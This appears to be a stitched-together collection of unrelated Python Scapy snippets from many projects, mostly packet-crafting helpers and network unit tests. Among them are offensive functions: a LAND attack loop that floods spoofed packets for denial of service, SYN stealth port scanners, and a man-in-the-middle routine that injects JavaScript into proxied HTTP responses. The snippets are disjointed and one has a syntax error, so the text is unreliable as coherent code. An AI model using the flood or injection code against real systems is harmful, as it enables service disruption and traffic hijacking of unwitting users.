def send_pkt(iface, dst_ip_addr, message): addr = socket.gethostbyname(dst_ip_addr) print "sending on interface {} to IP addr {}".format(iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr) / TCP( dport=1234, sport=random.randint(49152, 65535)) / message pkt.show2() sendp(pkt, iface=iface, verbose=False)
def test_saprouter_dissection(self): """Test dissection of a basic SAP Router packet. """ pkt = Ether() / IP() / TCP(dport=3299) / SAPNI() / SAPRouter() packet = self.get_capture(pkt)[0] self.assertIn('sapni', packet) self.assertEqual(int(packet['sapni'].length), 24) self.assertIn('saprouter', packet)
def __init__(self): self.Ether = Ether() self.IP = IP() self.ARP = ARP() self.TCP = TCP() self.UDP = UDP() self.ICMP = ICMP() self.BOOTP = BOOTP() self.DHCP = DHCP()
def test_sapni_pong(self): """Test dissection of a basic SAP NI PONG packet. """ pkt = Ether() / IP() / TCP(dport=3299) / SAPNI() / "NI_PONG\x00" packet = self.get_capture(pkt)[0] self.assertIn('sapni', packet) self.assertEqual(int(packet['sapni'].length), 8) self.assertIn('saprouter', packet)
def send_packet(self, flag_operation, message_value, process_pid): pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type=TYPE_GVT) pkt = pkt / GvtProtocol( flag=flag_operation, value=message_value, pid=process_pid) pkt = pkt / IP(dst=self.addr) / TCP(dport=1234, sport=random.randint(49152, 65535)) sendp(pkt, iface=self.iface, verbose=False)
def test_02_ip_range_no_match_v4(self): for i in [62, 63, 128, 129]: # around the edges of 1.1.1.64/26 dst_ip = "1.1.1." + str(i) test_packet = Ether()/IP(src="10.11.12.13", dst=dst_ip)/TCP(sport=45678, dport=80) self.sendp(test_packet, iface=self.IFACE_NAME_PY) # test these land on KNI as they don't match due to the `/25` specified not containing the rest of the `/24`. packet = self.wait_for_packet(self.kni_tx, lambda packet: isinstance(packet.payload, IP) and packet.payload.dst == dst_ip) assert_equals(packet.payload.dst, dst_ip)
def main(): """Send and receive TCP packet.""" args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip', 'dscp']) rxq = RxQueue(args.get_arg('rx_if')) txq = TxQueue(args.get_arg('tx_if')) src_mac = args.get_arg('src_mac') dst_mac = args.get_arg('dst_mac') src_ip = args.get_arg('src_ip') dst_ip = args.get_arg('dst_ip') dscp = int(args.get_arg('dscp')) if 6 == ip_address(unicode(src_ip)).version: is_ipv4 = False else: is_ipv4 = True sent_packets = [] if is_ipv4: ip_pkt = IP(src=src_ip, dst=dst_ip) / \ TCP() else: ip_pkt = IPv6(src=src_ip, dst=dst_ip) / \ TCP() pkt_send = Ether(src=src_mac, dst=dst_mac) / \ ip_pkt sent_packets.append(pkt_send) txq.send(pkt_send) pkt_recv = rxq.recv(2, sent_packets) if pkt_recv is None: raise RuntimeError('Rx timeout') if is_ipv4: check_ipv4(pkt_recv, dscp) else: check_ipv6(pkt_recv, dscp) sys.exit(0)
def main(): iface = get_iface() fam, hw = get_if_raw_hwaddr( iface) # returns family and hardware address of the interface print "sending on interface %s" % (iface) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') # pkt 1: a non-DHCP pkt with src IP 0.0.0.0 to simulate a client which hasn't been assigned IP addr yet # DROPPED pkt1 = pkt / IP(src='0.0.0.0', dst='255.255.255.255') / TCP( dport=1234, sport=random.randint(49152, 65535)) pkt1.show2() # for a developed view of the assembled packet sendp(pkt1, iface=iface, verbose=False) # sendp works at layer 2 # pkt 2: a DHCP discover pkt with src IP 0.0.0.0 # FORWARDED pkt2 = pkt / IP(src='0.0.0.0', dst='255.255.255.255') / UDP( dport=67, sport=68) / BOOTP(op=1, chaddr=hw) / DHCP( options=[('message-type', 'discover'), ('end')]) pkt2.show2() sendp(pkt2, iface=iface, verbose=False) # pkt 3: a DHCP request pkt with its original src IP # FORWARDED pkt3 = pkt / IP(dst='255.255.255.255') / UDP(dport=67, sport=68) / BOOTP( op=1, chaddr=hw) / DHCP(options=[('message-type', 'request'), ('end')]) pkt3.show2() sendp(pkt3, iface=iface, verbose=False) # pkt 4: a non-DHCP pkt with its original src IP # FORWARDED pkt4 = pkt / IP(dst='255.255.255.255') / TCP( dport=1234, sport=random.randint(49152, 65535)) pkt4.show2() sendp(pkt4, iface=iface, verbose=False) # pkt 5: a non-DHCP pkt with spoofed src IP 10.0.1.3, which doesn't exist in the DHCP bindings table # DROPPED pkt5 = pkt / IP(src='10.0.1.3', dst='255.255.255.255') / TCP( dport=1234, sport=random.randint(49152, 65535)) pkt5.show2() sendp(pkt5, iface=iface, verbose=False)
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error( 'Interface {} not found. Use habu.interfaces to show valid network interfaces' .format(iface)) return False layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def write_packet(self, packet, modified, to_broker): p = MQTT(packet).show2(dump=True, indent=0) info = "\n\nTime: {}\nTo Broker: {} \n".format(time.time(), to_broker) if to_broker and modified: src_ip = self.fuzzer_ip src_port = self.fuzzer_port dst_ip = self.broker_ip dst_port = self.broker_port seq = self.seq1 ack = self.ack1 elif to_broker and not modified: src_ip = self.client_ip src_port = self.client_port dst_ip = self.fuzzer_ip dst_port = self.broker_port seq = self.seq2 ack = self.ack2 elif not to_broker and modified: src_ip = self.fuzzer_ip src_port = self.broker_port dst_ip = self.client_ip dst_port = self.client_port seq = self.seq2 ack = self.ack2 elif not to_broker and not modified: src_ip = self.broker_ip src_port = self.broker_port dst_ip = self.fuzzer_ip dst_port = self.fuzzer_port seq = self.seq1 ack = self.ack1 if modified: self.pktwriter.write(info) self.pktwriter.write(p) else: self.pktinputwriter.write(info) self.pktinputwriter.write(p) self.pktwriterpcap.write( Ether() / IP(src=src_ip, dst=dst_ip) / TCP(sport=src_port, dport=dst_port, seq=seq, flags='PA', ack=seq) / packet) # increase seq number if to_broker and modified: self.ack1 = self.seq1 self.seq1 += len(packet) % pow(2, 32) elif to_broker and not modified: self.ack2 = self.seq2 self.seq2 += len(packet) % pow(2, 32) elif not to_broker and modified: self.ack2 = self.seq2 self.seq2 += len(packet) % pow(2, 32) elif not to_broker and not modified: self.ack1 = self.seq1 self.seq1 += len(packet) % pow(2, 32)
def _mitm_http_req(self, http_req): """do proxy http request and response with injected payload""" # response ack first l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP( src=self.http_ip, dst=self.client_ip) ack = TCP(dport=http_req[TCP].sport, sport=http_req[TCP].dport, flags="A", seq=http_req.ack, ack=http_req.seq + 1) sendp(l2_l3 / ack, verbose=False) # send proxy request and get response ip = http_req[HTTPRequest].Host.decode(encoding="ascii") port = http_req[TCP].dport proxy_http_req = HTTP() / http_req[HTTPRequest] http_res = TCP_client.tcplink(proto=HTTP, ip=ip, port=port).sr1(proxy_http_req, verbose=False) # inject js into payload and forward packets recursively def rec_forward_load(load, seq, template_p, total_len=None, window_size=167): total_len = total_len if total_len is not None else len(load) l2 = Ether(src=self.attacker_mac, dst=self.client_mac) l3 = IP(src=self.http_ip, dst=self.client_ip) if len(load) > window_size: this_load, rest_load = load[:window_size], load[window_size:] l4 = TCP(dport=http_req[TCP].sport, flags="PA", seq=seq, ack=http_req.seq + 1) p = l2 / l3 / l4 / template_p p = MyUtil.set_load(p, this_load, rest_len=len(rest_load) - 2) # I don't know why -2 sendp(p, verbose=False) rec_forward_load(load=rest_load, seq=seq + window_size, template_p=template_p, total_len=total_len, window_size=window_size) else: # last packet l4 = TCP(dport=http_req[TCP].sport, flags="FA", seq=seq, ack=http_req.seq + 1) p = l2 / l3 / l4 / template_p p = MyUtil.set_load(p, load, rest_len=0) sendp(p, verbose=False) new_load = http_res[Raw].load.replace( b"</body>", f"<script>{self.script}</script></body>".encode("ascii")) rec_forward_load(load=new_load, seq=http_req.ack, template_p=http_res)
def cmd_tcp_flags(ip, port, flags, rflags, verbose, first): """Send TCP packets with different flags and tell what responses receives. It can be used to analyze how the different TCP/IP stack implementations and configurations responds to packet with various flag combinations. Example: \b # habu.tcp_flags www.portantier.com S -> SA FS -> SA FA -> R SA -> R By default, the command sends all possible flag combinations. You can specify which flags must ever be present (reducing the quantity of possible combinations), with the option '-f'. Also, you can specify which flags you want to be present on the response packets to show, with the option '-r'. With the next command, you see all the possible combinations that have the FIN (F) flag set and generates a response that contains the RST (R) flag. Example: \b # habu.tcp_flags -f F -r R www.portantier.com FPA -> R FSPA -> R FAU -> R """ conf.verb = False pkts = [(IP(dst=ip) / TCP(flags=f, dport=port)) for f in range(0, 512)] out = "{:>8} -> {:<8}" for pkt in pkts: if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags): if verbose: print(pkt.summary()) ans = sr1(pkt, timeout=0.2) if ans: if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags): print( out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%"))) if first: break return True
def test_send_packet_with_answer(self): from scapy.all import IP, TCP sender = txscapy.ScapySender() self.scapy_factory.registerProtocol(sender) packet_sent = IP(dst='8.8.8.8', src='127.0.0.1') / TCP(dport=53, sport=5300) packet_received = IP(dst='127.0.0.1', src='8.8.8.8') / TCP(sport=53, dport=5300) d = sender.startSending([packet_sent]) self.scapy_factory.super_socket.send.assert_called_with(packet_sent) sender.packetReceived(packet_received) result = yield d assert result[0][0][0] == packet_sent assert result[0][0][1] == packet_received
def send_packet(self, message_value, process_pid, p_addr): self.payload = {} self.payload[process_pid] = message_value pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type=0x800) pkt = pkt / IP(dst=p_addr) / TCP( dport=1234, sport=random.randint(49152, 65535)) / json.dumps( self.payload) sendp(pkt, iface=self.iface, verbose=False)
def craft_tcp(hdr, data, middle, sport=50000, dport=60000, seq=0): middle = [x for x in sorted(middle) if x > 0 and x < len(data)] middle.append(len(data)) start = 0 snd = [] rcv = [] for limit in middle: snd.append(hdr/TCP(sport=sport, dport=dport, flags='', \ seq=seq+start)/Raw(load=data[start:limit])) start = limit rcv.append(hdr/TCP(sport=sport, dport=dport, flags='', \ seq=seq)/Raw(load=data)) return ([i.__class__(str(i)) for i in snd], [i.__class__(str(i)) for i in rcv])
def test_check(): """ Tests action tree check function. """ a = actions.tree.ActionTree("out") logger = logging.getLogger("test") a.parse("[TCP:flags:RA]-tamper{TCP:flags:replace:S}-|", logger) p = layers.packet.Packet(IP() / TCP(flags="A")) assert not a.check(p, logger) p = layers.packet.Packet(IP(ttl=64) / TCP(flags="RA")) assert a.check(p, logger) assert a.remove_one() assert a.check(p, logger) a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger) assert a.check(p, logger) a.parse("[IP:ttl:64]-tamper{TCP:flags:replace:S}-|", logger) assert a.check(p, logger) p = layers.packet.Packet(IP(ttl=15) / TCP(flags="RA")) assert not a.check(p, logger)
def test_multicast_sa_da(a, port_interface_mapping, exp_src_mac, exp_dst_mac): fwd_pkt1 = Ether() / IP(src='10.1.0.3', dst='224.1.0.1') / TCP(sport=5793, dport=80) fwd_pkt2 = Ether() / IP(src='10.1.0.5', dst='224.1.0.1') / TCP(sport=5793, dport=80) exp_pkt1 = (Ether(src=exp_src_mac) / IP(src='10.1.0.3', dst='224.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80)) exp_pkt2 = (Ether(src=exp_src_mac) / IP(src='10.1.0.5',dst='224.1.0.1', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80)) pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1}, {'port': 1, 'packet': fwd_pkt2}]) input_ports = {0, 1} output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1}, {'port': 3, 'packet': exp_pkt1}, {'port': 4, 'packet': exp_pkt2}, {'port': 5, 'packet': exp_pkt2}, {'port': 6, 'packet': exp_pkt2}], pack, input_ports) return output
def test_parse_num(logger): """ Tests parsing integers """ packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data")) tamper = actions.tamper.TamperAction(None, tamper_type="options") assert tamper.parse("TCP:options-mss:replace:1440", logger) lpacket, rpacket = tamper.run(packet, logger) assert lpacket["TCP"].options[0][1] == 1440
def end_fin(self, tcp): ip = self.ip_type(src=self.remote_addr, dst=self.local_addr) tcp = TCP(dport=self.local_port, sport=self.remote_port, seq=tcp.ack, ack=tcp.seq + 1, flags="FA") send_local("FIN", ip / tcp, self.socket_type)
def stealth_scan(self, ip, port): probe = sr1(IP(dst=ip) / TCP(dport=port, flags="S"), verbose=False, timeout=3) if probe is not None: if probe.haslayer(TCP) and probe.getlayer(TCP).flags == 0x12: sr1(IP(dst=ip) / TCP(dport=port, flags="R"), verbose=False, timeout=3) return [ port, "TCP", "Abierto", self.__list_port.get_sevice("TCP", port) ] elif probe.haslayer(ICMP): if int(probe.getlayer(ICMP).type) == 3 and int( probe.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]: return [port, "TCP", "Filtrado", self.__response.sport]
def test_invalid_write(self): """Test invalid write vulnerability in LZC code (CVE-2015-2282)""" test_case = read_data_file('invalid_write_testcase.data', False) pkt = Ether()/IP()/TCP(dport=3200)/SAPNI()/Raw(str(SAPDiag(compress=1))[:-8])/test_case packet = self.get_capture(pkt)[0] self.assertIn('sapdiag', packet)
def writePCAP(src, dst, data): try: pktdump = PcapWriter(sOutfile + '.pcap', append=True, sync=True) pktinfo = Ether() / IP(src=src[0], dst=dst[0]) / TCP( sport=src[1], dport=dst[1]) / data pktdump.write(pktinfo) pktdump.close() except Exception as Error: #print(str(Error)) pass
def test_options_mss(): """ Tests options-eol. """ pkt = TCP(options=[("MSS", 1440)]) p = layers.packet.Packet(pkt) assert p.get("TCP", "options-mss") == 1440 p2 = layers.packet.Packet(TCP(bytes(p))) assert p2.get("TCP", "options-mss") == 1440 p = layers.packet.Packet(TCP(options=[])) assert p.get("TCP", "options-mss") == "" p.set("TCP", "options-mss", 2880) p.show() assert len(p["TCP"].options) == 1 assert any(k == "MSS" for k, v in p["TCP"].options) value = p.gen("TCP", "options-mss") p.set("TCP", "options-mss", value) p2 = TCP(bytes(p)) assert any(k == "MSS" for k, v in p2["TCP"].options)
def analyze_port(tgt, port): logger.info(" - Analizando puerto %s" % port) res = sr1(IP(dst=tgt)/TCP(dport=port,, flags='S'), verbose=False, timeout=0.2) if res: if res[TCP.flags == 18]: logger.info(" |_ Puerto %s abierto" % port) OPEN_PORTS.append(port) else: logger.debug(" |_ Puerto %s cerrado" % port)
def test_option_8(logger): """ Tests options 7 """ packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data")) tamper = actions.tamper.TamperAction(None) assert tamper.parse("TCP:options-timestamp:replace:40000", logger) lpacket, rpacket = tamper.run(packet, logger) assert lpacket["TCP"].options[0][1] == (40000, 0)
def test_parse_run(logger): """ Tests the ability to parse """ packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data")) tamper = actions.tamper.TamperAction(None) assert tamper.parse("TCP:options-mss:corrupt", logger) lpacket, rpacket = tamper.run(packet, logger) assert lpacket["TCP"].options[0][1] != 0
def test_sapdiag_dissection(self): """Test dissection of a basic SAP Diag packet. """ pkt = Ether()/IP()/TCP(dport=3200)/SAPNI()/SAPDiag() packet = self.get_capture(pkt)[0] self.assertIn('sapni', packet) self.assertEqual(int(packet['sapni'].length), 8) self.assertIn('sapdiag', packet)
def test_option_1(logger): """ Tests option 1 """ packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data")) tamper = actions.tamper.TamperAction(None, tamper_type="options") assert tamper.parse("TCP:options-nop:corrupt", logger) lpacket, rpacket = tamper.run(packet, logger) assert lpacket["TCP"].options[0][1] == ()
def analyze_port(host, port, sem): print "[ii] Analizando el puerto %s" % port res = sr1(IP(dst=host) / TCP(dport=port), verbose=False, timeout=0.2) if res is not None and TCP in res: if res[TCP].flags == 18: OPEN_PORTS.append(port) print "Puerto %s abierto " % port sem.release()
def test_correct_assignment(logger): """ Tests that all options can be assigned """ for option in layers.tcp_layer.TCPLayer.scapy_options.values(): print(option) packet = layers.packet.Packet(IP(src="127.0.0.1", dst="127.0.0.1")/TCP(sport=2222, dport=3333, seq=100, ack=100, flags="S")/("data")) tamper = actions.tamper.TamperAction(None, field="options-" + str(option.lower()), tamper_type="corrupt") lpacket, rpacket = tamper.run(packet, logger) assert lpacket["TCP"].options[0][0] == option